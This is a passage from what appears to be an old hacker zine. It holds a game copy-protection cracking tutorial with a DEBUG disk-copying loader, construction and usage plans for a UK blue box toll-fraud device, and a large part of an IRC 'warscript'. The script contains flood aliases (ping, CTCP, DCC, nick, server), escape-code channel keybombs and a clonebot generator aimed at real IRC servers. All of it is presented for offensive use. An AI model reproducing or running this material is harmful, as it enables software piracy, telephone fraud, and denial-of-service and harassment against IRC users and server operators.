this point, take a look at the passwords, and write down the most unusual one that you can find (I'll explain later). Now type that password in as the search string, and let NU search through the file until it finds the password. Now a couple of things can happen. 1. It only finds one occurrence 2. It finds more than one occurrence 3. It doesn't find any occurrence In the event of case 2 then YOU have to determine where the passwords are stored, you can do this by opening your eyes and looking. In the event of case 3, go to the kitchen and start a pot of coffee, then tell you wife to go to bed without you, because you have a "Special Project" that you have to finish tonight. And by the way, Good Luck. You'll need it. Hopefully case 1 will occur, now you have to take a look at the data and ask yourself 2 questions: 1. Are all the passwords the same length? 2. Is there a set number of spaces between each pass- word? 3. Does the next password always start a certain number of characters from the first character of the previ- ous password? If you can answer yes to any of the above questions, you in luck. All you have to do is change the passwords to spaces (If the program allows that, Battlehawks doesn't) or change them to you favorite character. The letter X works good, it's easy to type and easy to remember. If you can't answer yes to any of the questions then you ei- ther need to bypass the Doc Check routine itself or you need to be adventurous and experiment. Battlehawks will not follow any of the above patterns, and your quickly running out of time, so you'll have to try something, fast... So just wiped out all of the data area with X's, all the passwords and associated "garbage" between them. Then saved the changes and drop out of NU and into BH. Then when it ask for the password, just filed the area with X's. Next thing you know, you'll be escorting a bombing run on a Japanese carrier. So, this one turned out to be fairly simple. Where you may run into trouble is on Doc Checks that use a graphic system, such as Gunship by MicroProse. When it comes to this type of Doc Check, you almost have to bypass the routine itself. And again, a good way to do this is with setting break points and using the trace option in Debug. END. 25 ------------------------------------------------------------- That was the easy version Doc Check crack, however there a "Better" way to crack Doc Checks, is to bypass the routine completely so the user can just press enter and not worry about spaces. Let's take a lot at this method by looking at a crack for the program, Yeager's Advanced Flight Trainer, by Electronic Arts. ------------------------------------------------------------- By: PTL Title: Yeager's Advanced Flight Trainer 26 Chapter 5 Cracking Self Booters ------------------------------------------------------------- Now we'll take a look at cracking self booters. A few compa- nies have found this to be the best copy protection scheme for them, one of which is DataEast, makers of Ikari Warriors, Victory Road, Lock-On, Karnov, etc... This posses a special problem to the Amateur Cracker, since they seldom use stan- dard DOS formats. So let's jump right in! ------------------------------------------------------------- This is the area where a "Higher than Normal" knowledge of Assembly Language and DOS Diskette structures, so first of all, the Basic's. The Disk's Physical Structure Data is recorded on a disk in a series of concentric circles, called Tracks. Each track if further divided into segments, called Sectors. The standard double-density drives can record 40 tracks of data, while the new quad-density drives can record 80 tracks. However, the location, size, and number of the sectors within a track are under software control. This is why the PC's diskettes are known as soft-sectored. The characteristics of a diskette's sectors (Their size, and the number per track) are set when each track is formatted. Disk Formatting can be done either by the operating system or by the ROM-BIOS format service. A lot of self booters and almost all forms of copy protection create unusual formats via the ROM-BIOS diskette services. The 5 1/4-inch diskettes supported by the standard PC BIOS may have sectors that are 128,256,512, or 1,024 bytes in size. DOS, from versions 1.00 through 4.01 has consistently used sectors of 512 bytes, and it is quite possible that this will continue. Here is a table displaying 6 of the most common disk formats: _____________________________________________________________ Type Sides Sectors Tracks Size(bytes) _____________________________________________________________ S-8 1 8 40 160K D-8 2 8 40 320K S-9 1 9 40 180K D-9 2 9 40 360K QD-9 2 9 80 720K QD-15 2 15 80 1,200K _____________________________________________________________ S - Single Density D - Double Density QD - Quad Density Of all these basic formats, only two are in widespread use: S-8 and D-9. The newer Quad Density formats are for the 3 1/2" and 5 1/4" high density diskettes. The Disk's Logical Structure So, as we have already mentioned, the 5 1/4-inch diskette formats have 40 tracks, numbered from 0 (the outside track) through 39 (the inside track, closest to the center). On a double sided diskette, the two sides are numbered 0 and 1 (the two recording heads of a double-sided disk drive are also numbered 0 and 1). The BIOS locates the sectors on a disk by a three-dimensional coordinate composed of a track number (also referred to as the cylinder number), a side number (also called the head number), and a sector number. DOS, on the other hand, lo- cates information by sector number, and numbers the sectors sequentially from the outside to inside. We can refer to particular sectors either by their three-dimensional coordinates or by their sequential order. All ROM-BIOS operations use the three-dimensional coordinates to locate a sector. All DOS operations and tools such as DE- BUG use the DOS sequential notation. The BASIC formula that converts the three-dimensional coordi- nates used by the ROM-BIOS to the sequential sector numbers used by DOS is as follows: DOS.SECTOR.NUMBER = (BIOS.SECTOR - 1) + DIOS.SIDE * SECTORS.PER.SIDE + BIOS.TRACK * SECTORS.PER.SIDE * SIDES.PER.DISK And here are the formulas for converting sequential sector numbers to three-dimensional coordinates: BIOS.SECTOR = 1 + DOS.SECTOR.NUMBER MOD SECTORS.PER.SIDE BIOS.SIDE = (DOS.SECTOR.NUMBER \ SECTORS.PER.SIDE) MOD SIDE.PER.DISK BIOS.TRACK = DOS.SECTOR.NUMBER \ (SECTORS.PER.SIDE * SIDES.PER.DISK) (Note: For double-sided nine-sector diskettes, the PC's most common disk format, the value of SECTORS.PER.SIDE is 9 and the value of SIDES.PER.DISK is 2. Also note that sides and tracks are numbered differently in the ROM-BIOS numbering system: The sides and tracks are num- bered from 0, but the sectors are numbered from 1.) Diskette Space Allocation The formatting process divides the sectors on a disk into four sections, for four different uses. The sections, in the order they are stored, are the boot record, the file alloca- tion table (FAT), the directory, and the data space. The size of each section varies between formats, but the struc- ture and the order of the sections don't vary. The Boot Record: This section is always a single sector located at sector 1 of track 0, side 0. The boot record contains, among other things, a short program to start the process of loading the operating system on it. All diskettes have the boot record on them even if they don't have the operating system. Asisde from the start-up program, the exact contents of the boot record vary from format to format. The File Allocation Table: The FAT follows the boot record, usually starting at sector 2 of track 0, side 0. The FAT contains the official record of the disk's format and maps out the location of the sectors used by the disk files. DOS uses the FAT to keep a record of the data-space usage. Each entry in the table con- tains a specific code to indicate what space is being used, what space is available, and what space is unusable (Due to defects on the disk). The File Directory: The file directory is the next item on the disk. It is used as a table of contents, identifying each file on the disk with a directory entry that contains several pieces of information, including the file's name and size. One part of the entry is a number that points to the first group of sec- tors used by the file (this number is also the first entry for this file in the FAT). The Data Space: Occupies the bulk of the diskette (from the directory through the last sector), is used to store data, while the other three sections are used to support the data space. Sectors in the data space are allocated to files on an as-needed basis, in units known as clusters. The clusters are one sector long and on double-sided diskettes, they are a pair of adjacent sectors. (From here on I'll continue to describe the basics of DOS disk structures, and assembly language addressing technics. ------------------------------------------------------------- Here is a simple routine to just make a backup copy of the Flight Simulator Version 1.0 by Microsoft. I know the latest version is 3.x but this version will serve the purpose of demonstrating how to access the data and program files of a selfbooter. ------------------------------------------------------------- By: PTL Title: Microsoft Flight Simulator 1.00 Unprotect This procedure will NOT convert the Flight Simulator disk to files that can be loaded on a hard drive. But... it will read off the data from the original and put it onto another floppy. And this should give you an idea of how to read data directly from a disk and write it back out to another disk. First of all take UNFORMATTED disk and place it in drive B:. This will be the target disk. Now place your DOS disk (which has Debug) into drive A:, or just load Debug off you hard disk. A>DEBUG Then we are going to enter (manually) a little program to load the FS files off the disk. -E CS:0000 B9 01 00 BA 01 00 BB 00 01 0E 07 06 1F 88 E8 53 5F AA 83 C7 03 81 FF 1C 01 76 F6 B8 08 05 CD 13 73 01 90 FE C5 80 FD 0C 76 E1 90 CD 20 -E CS:0100 00 00 01 02 00 00 02 02 00 00 03 02 00 00 04 02 00 00 05 02 00 00 06 02 00 00 07 02 00 00 08 02 Next we'll [R]eset the IP Register by typing. -R IP And then typing four zeros after the address prefix. xxxx:0000 Next insert the original Flight Simulator disk into drive A: and we'll run our little loader. -G =CS:0000 CS:22 CS:2A Now enter a new address to load from. -E CS:02 0E -E CS:27 19 And run the Loader again. -G =CS:0000 CS:22 CS:2A New address -E CS:02 27 -E CS:27 27 Run Loader -G =CS:0000 CS:22 CS:2A Here we'll do some [L]oading directly from the disk our- selves. -L DS:0000 0 0 40 And the in turn, write it back out to the B: (1) drive -W DS:0000 1 0 40 Etc... -L DS:0000 0 40 28 -W DS:0000 1 70 30 -L DS:0000 0 A0 30 -W DS:0000 1 A0 30 -L DS:0000 0 138 8 -W DS:0000 1 138 8 When we are all through, [Q]uit from debug and you should have a backup copy of the Flight Simulator. -Q And that's all there is to it. END. []------------------[] -------------------------------+ 03 - Plans for the UK blue box | -------------------------------+ ________________________________________________________________________ 2280hz Blue Box Circuit - from 0943 817010 *** OPEN SOON *** ________________________________________________________________________ Circuit Diagram - / Connect to Send _______________________ ____/ __________________ ! ! ! ! ! ! ! /! ! _________! ____ ________ __ ! _! / ! Small ! ! ______!_____! ____ ! ! ! !__! ! Loudspeaker ! ! ! __!_____!_____!__!__!__ ! ! \ ! ! ! ! ! E D C B A 9 8 ! ! ! \! ! ! ! ! ! ! ! ! ! ! ! ! 4047B IC ! ! ! ! 100 Ohm Resistor ! ! ! ! ! ! ! ! ! ! ! !__1__2__3__4__5__6__7__! ! ! ! ! ! ! ! ! ! ! ! ! ! ! __!__ +ve ! ! ! ! ! !__!__!__! ____! ! ___ 9v cell ! ! ! ! ! ______! ! ! -ve ! ! _! _! ! ! __________! ! ! ! ! ! ! ! / ! ! ! !____! ! ____! ___! ___!/ ! ! ! ! ! ! ! !\ ZTX 300 ! ! ! 0.01uF! !_! !_! ! \ ___! ! ! ! ! ! ! ! ! / ! ! ! ! ! !___!/ ! ! ! ! ! !\ ZTX 300 ! ! ! ! ! \___________________________! ! ! ! ! ! ! ! ! 10K ! ! ! ! 80! ! ! Ohms ! ! ! ! Ohms ! ! ! ! ! ! ! ! ! ! ! ! 6.2 ! ! ! ! ! ! Ohms ! ! ! ! ! ! ! ! ! ! ! ! !_______! ! ! ! ! ! !____________________!_________________________________________! Components List - 1 4047B IC (about 25p) 2 ZTX 300 transistors (about 14p each) 1 0.01uF ceramic disc capacitor (about 5p) 1 10K resistor (about 2p) 1 100 ohm resistor (about 2p) 1 80 ohm resistor (about 2p) 1 6.2 ohm resistor (about 2p) 1 10x24 veroboard (about 40p) 1 Miniature Loudspeaker (about 90p) 1 Push to connect switch (about 40p) Total cost 2.20 Extras - 1 blue coloured box (spray this pink to conceal purpose of device) 1 9v battery Construction - The device is very simple to construct and can be made small enough to fit onto a 10x24 veroboard. Note: ZTX 300 Transistor / collector base !/ !\ \ emitter How the Device Works - The three resistors and the capacitor set the frequency. If the capacitor is 0.1uF then the resistor value can be calculated in the following way: R = 23000000 ________ frequency So, the resistor value for 2600hz would be: R = 23000000 = 8846.15 Ohms (this is no good, however because it ________ must be more than 10K) 2600 The frequency that the 4047B outputs is then amplified by the two transistors(a darlington pair) before being put through the loudspeaker. Using the Device - 1) Dial a long-distance unobtainable number. 2) Hold the speaker against the phone microphone. 3) Send the 2280hz tone by holding the switch down on the device. 4) Pulse/Tone(exchange dependent)dial the exchange number. 5) Dial number to connect to. For more information on this see 'phreak' on 0943 817010 (24 hours) ** OPEN SOON ** NB: DO NOT CONNECT THIS DEVICE INDIRECTLY OR DIRECTLY TO ANY TELEPHONE NETWORK IN THE UK. _______________________________________________________________________ Feel free to add your own credits, but don't remove those that are already there ! _______________________________________________________________________ []------------------[] --------------------------+ 04 - Scythe IRC Warscript | --------------------------+ # # - + Scythe IRC Warscript from Vassago Version C + - # - + Released March 25th, 1995 + - # # This is a standalone version of my original PHOENIX.WAR from PhoEniX # Version 2.01, with many enhancements added. It should work fine with # any script (I hope :). This script will work with all 2.2.9 IRCII # clients and ascending versions. Users of IRCII 2.3.17 and variations # may experience some problems using this script. Scythe may or may not # work correctly on VMS/VAX systems. This script has NO version message # additions, so the only person who knows you are running it will be you. # # Please do NOT use this script unless you get it directly from my # jcowan.reslife.okstate.edu FTP site. I only guarantee my scripts to be # free from backdoors IF THEY ARE DOWNLOADED DIRECTLY from this site. # # - Vassago (Ryan Addams) # [mordy@wentz415.reslife.okstate.edu] # alias sxecho {^xecho -level crap [S/X] $0-} echo [S/X] Loading Vassago's SCYTHE, one moment please... # Defaults for flash & nuke used in NUKE, FLASH, SNUKE, MASSFLASH, MFLASH. # If you want to specify a different directory for these, do so here. assign flash_pgm flash assign mflash_pgm mflash assign nuke_pgm nuke # Servers for use as RANDOM servers in the /CLONEBOTS CLONE command. # These should all allow connections from your host. assign CSERV[1] bazooka.rutgers.edu assign CSERV[2] irc.uiuc.edu assign CSERV[3] irc.escape.com assign CSERV[4] minnie.cc.utexas.edu assign CSERV[5] irc.indiana.edu assign CSERV[6] cs-pub.bu.edu assign CSERV[7] alfred1.u.washington.edu assign CSERV[8] organ.ctr.columbia.edu assign CSERV[9] irc.texas.net assign CSERV[10] irc-2.mit.edu @ cservnum = 11 ### Other Default Assigns assign CLONEUNAME NONE assign CLONEPORT 6667 assign CLONEWINDOW OFF assign TSU ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ assign RCRAPCRAP abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789a @ SERVCOUNT = 1 @ NUMCLONES = 0 alias randcrap { @ RCOUNTER = 1 while (RCOUNTER < [$0]) { @ RCOUNTER = RCOUNTER + 1 EVAL ^assign RCRAP $MID($rand(62) 1 $RCRAPCRAP)${RCRAP} } EVAL ^assign RCRAP $MID($rand(25) 1 $RCRAPCRAP)${RCRAP} ^assign FUNCTION_RETURN $RCRAP ^assign -RCRAP } alias repeatcmd { @ RCOUNT = 0 while (RCOUNT < [$0]) { @ RCOUNT = RCOUNT + 1 /$1- } ^assign -RCOUNT } ^set NOVICE OFF ^set EXEC_PROTECTION OFF on ^dcc_raw "*" # on ^dcc_raw "% % D *PIN*" {//^dcc raw $0 $1 PONG :$1} ### Miscellaneous Floods alias toolzbomb { quote PRIVMSG $0 :TOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZ quote PRIVMSG $0 :TOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZ quote PRIVMSG $0 :TOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZ quote PRIVMSG $0 :TOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZ quote PRIVMSG $0 :TOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZTOOLZ /sxecho ToolZ bombed $0\, you might get a lot of replies. } alias multiflood { /quote PRIVMSG $0 :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /quote PRIVMSG $0 :USERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFO /quote PRIVMSG $0 :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /quote PRIVMSG $0 :USERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFOUSERINFO /quote PRIVMSG $0 :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /quote PRIVMSG $0 :SEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSED /quote PRIVMSG $0 :PINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPING /sxecho Multiple flooded $0\, you might get a lot of replies. } alias verflood { quote PRIVMSG $0 :VERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVER quote PRIVMSG $0 :VERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVER quote PRIVMSG $0 :VERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVER quote PRIVMSG $0 :VERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVER quote PRIVMSG $0 :VERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVERVER /sxecho VER flooded $0\, you might get a lot of replies. } alias pingflood { quote PRIVMSG $0 :PINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPING quote PRIVMSG $0 :PINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPING quote PRIVMSG $0 :PINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPING quote PRIVMSG $0 :PINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPING quote PRIVMSG $0 :PINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPINGPING /sxecho PING flooded $0\, you might get a lot of replies. } alias pongflood { repeatcmd 4 EVAL /quote PONG $TSU :$0 sxecho PONG flood sent to $0\. } alias sedflood { quote PRIVMSG $0 :SEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSED quote PRIVMSG $0 :SEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSED quote PRIVMSG $0 :SEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSED quote PRIVMSG $0 :SEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSED quote PRIVMSG $0 :SEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSEDSED /sxecho I have CTCP SED flooded $0\. } alias tsunami { EVAL repeatcmd 4 quote PRIVMSG $0 :$TSU sxecho I have tsunamied $0\. } alias dccbomb { quote PRIVMSG $0 :DCC SEND trsiult9_1.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_2.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_3.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_4.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_5.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_6.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_7.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_8.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_9.zip $rand(99999999) 19 6667 quote PRIVMSG $0 :DCC SEND trsiult9_10.zip $rand(99999999) 19 6667 /sxecho I have DCC autoget bombed $0\. } alias dccflood { quote PRIVMSG $0 :DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99) quote PRIVMSG $0 :DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99) quote PRIVMSG $0 :DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99) quote PRIVMSG $0 :DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99) quote PRIVMSG $0 :DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99)DCC CHAT $rand(9999) $rand(99) $rand(99) /sxecho I have DCC flooded $0\. } alias dcctsunami { quote PRIVMSG $0 :DCC SEND $TSU$rand(9) $rand(9) $rand(9) quote PRIVMSG $0 :DCC SEND $TSU$rand(9) $rand(9) $rand(9) quote PRIVMSG $0 :DCC SEND $TSU$rand(9) $rand(9) $rand(9) quote PRIVMSG $0 :DCC SEND $TSU$rand(9) $rand(9) $rand(9) sxecho A DCC TSUNAMI has been sent to $0\. } alias ctcpflood { /repeatcmd 18 CTCP $0 CLIENTINFOCLIENTINFO /sxecho CTCP CLIENTINFO flooded $0\, you might get a lot of replies. } alias nickflood { EVAL ^assign OLDNICK $N @ NFCOUNTER = 0 EVAL @ NFCOUNT = $0 while (NFCOUNTER < NFCOUNT) { @ NFCOUNTER = NFCOUNTER + 1 EVAL quote NICK $randcrap(9) } ^assign -NFCOUNT ^assign -NFCOUNTER EVAL //nick $OLDNICK ^assign -OLDNICK } alias servflood { if (rmatch($0 *.*)) { @ SFLOODC = 0 EVAL @ SFLOODMAX = $1 while (SFLOODC < SFLOODMAX) { @ SFLOODC = SFLOODC + 1 ^set display off EVAL ^assign SERVPID $connect($0 6667) ^set display on EVAL //^dcc raw $SERVPID $0 SERVER $TSU$TSU # # :$encode($rand(9999))$rand(9) //^dcc close raw $SERVPID } ^assign -SERVPID ^assign -SFLOODC ^assign -SFLOODMAX /sxecho Server flooded $0 $1 times. } {/sxecho /servflood .} } ### Channel Keybombs alias kdie //mode $C +k #8[?3\;5h\(0 alias kfont //mode $C +k \(0 alias kinvert //mode $C +k [?3\;5h alias ksz //mode $C +k **B00 alias kcls //mode $C +k [2J alias kfire //mode $C +k [41\;5mFIRE![m[7m alias ksatan //mode $C +k [41\;5m!!S4T4N!![m[7m alias kreset //mode $C +k alias ktsunami //mode $C +k [H[J[7m ### Clonebot Control Handlers alias ck /clonebots kill all alias clone_window { if ([$CLONEWINDOW]!=[ON]) { ^assign CLONEWINDOW ON clear ^window new name Clones ^window scroll on ^window shrink 7 ^set hold_mode off ^window goto 2 cecho Clonebot control window has been activated. } { ^assign CLONEWINDOW OFF clear ^window refnum Clones wait -CMD window kill sxecho Clonebot control window has been deactivated. } } alias cecho {^xecho -window Clones [CLONES] $0-} alias cb.getcc { ^assign IN_CC1 $"[S/X] Number of clonebots to create: " if (IN_CC1 > 0) { ^assign IN_CC $IN_CC1 ^assign -IN_CC1 } {^cb.getcc} } alias cb { ^cb.getcc ^assign IN_CBSRV $"[S/X] Server to use (ENTER for random): " ^assign IN_CNICK $"[S/X] First part of clonebot nicks (ENTER for random):" ^assign IN_CUNAME $"[S/X] Username to TRY to signon under (ENTER for junk):" ^assign IN_CIRCNAME $"[S/X] Description (IRCNAME) (ENTER for none): " if ([$IN_CBSRV]==[]) {^assign IN_CBSRV random} if ([$IN_CNICK]==[]) {^assign IN_CNICK random} if ([$IN_CUNAME]==[]) {^assign CLONEUNAME NONE} {^assign CLONEUNAME $IN_CUNAME} /clonebots clone $IN_CC $IN_CBSRV $IN_CNICK $IN_CIRCNAME ^assign CLONEUNAME NONE ^assign -IN_CC ^assign -IN_CBSRV ^assign -IN_CNICK ^assign -IN_CIRCNAME ^assign -IN_CUNAME } alias clonhelp { sxecho +----------------+ Scythe Clonebots Generator Help +----------------+ sxecho /clonebots , where command is: sxecho clone

[] sxecho status, kill , whois sxecho CLONE creates new clonebots on . Substituting sxecho 'random' for the server name causes the servers to be chosen from sxecho CSERV array at the start of the script. Edit this array if you want sxecho to change the choices. Substituting 'random' for the nick-prefix sxecho causes the bots to have random garbage nick. sxecho STATUS displays the bots online, their servers, sockets, etc. sxecho KILL disconnects a clonebot. Kill 'all' disconnects all clonebots sxecho and resets the clonebot counter. sxecho WHOIS displays information about one of your bots from it's nick. sxecho Type '/assign CLONEUNAME ' to set a special username for sxecho the clonebots to signon under (setting to NONE defaults to random). sxecho '/assign CLONEPORT ' sets the port, default is 6667. sxecho /CB provides a user-friendly prompted interface to this command. sxecho /CK is a shortcut to /clonebots kill all. sxecho To control the clonebots, use the /CLONE command. sxecho +-------------------------------------------------------------------+ } on ^dcc_raw "% % C*" { if ([$CLONESOCKET[$CLONENUM[$0]]] == [$0]) { cecho Clonebot #$CLONENUM[$0] $$CLONENICKS[$CLONENUM[$0]]$ has been disconnected by server $1. ^assign -CLONES[$CLONENUM[$0]] ^assign -CLONESOCKET[$CLONENUM[$0]] ^assign -CLONESERV[$CLONENUM[$0]] ^assign -CLONENICKS[$CLONENUM[$0]] ^assign -CLONESPY[$CLONENUM[$0]] EVAL ^on dcc_raw - "$0 $1 D *" ^assign -CLONENUM[$0] } } alias cspyadd { if ([$index($1 $CLONESPY[$0])]==-1) {^assign CLONESPY[$0] $1${CLONESPY[$0]}} } alias cspyrm {/EVAL ^assign CLONESPY[$0] $strip($1 $CLONESPY[$0])} alias clonespyset { if ([$CLONES[$0]] == [ONLINE]) { if (rmatch($1 PU*)) {^cspyadd $0 P} if (rmatch($1 -PU*)) {^cspyrm $0 P} if (rmatch($1 PR*)) {^cspyadd $0 R} if (rmatch($1 -PR*)) {^cspyrm $0 R} if (rmatch($1 NO*)) {^cspyadd $0 N} if (rmatch($1 -NO*)) {^cspyrm $0 N} if (rmatch($1 MO*)) {^cspyadd $0 O} if (rmatch($1 -MO*)) {^cspyrm $0 O} if (rmatch($1 K*)) {^cspyadd $0 K} if (rmatch($1 -K*)) {^cspyrm $0 K} if (rmatch($1 J*)) {^cspyadd $0 J} if (rmatch($1 -J*)) {^cspyrm $0 J} if (rmatch($1 NI*)) {^cspyadd $0 I} if (rmatch($1 -NI*)) {^cspyrm $0 I} if (rmatch($1 MI*)) {^cspyadd $0 M} if (rmatch($1 -MI*)) {^cspyrm $0 M} if (rmatch($1 C*)) {^cspyadd $0 C} if (rmatch($1 -C*)) {^cspyrm $0 C} } {/cecho Error: Clone #$0, no such clone.} } alias cspylevs { if ([$CLONESPY[$0]] == [_]) {^assign FUNCTION_RETURN NONE} { if (index(M $CLONESPY[$0]) != -1) {^assign SLEVS MISC ${SLEVS}} if (index(I $CLONESPY[$0]) != -1) {^assign SLEVS NICK ${SLEVS}} if (index(J $CLONESPY[$0]) != -1) {^assign SLEVS JOIN/LEAVE/SIGNOFF ${SLEVS}} if (index(K $CLONESPY[$0]) != -1) {^assign SLEVS KICK ${SLEVS}} if (index(O $CLONESPY[$0]) != -1) {^assign SLEVS MODE ${SLEVS}} if (index(N $CLONESPY[$0]) != -1) {^assign SLEVS NOTICE ${SLEVS}} if (index(R 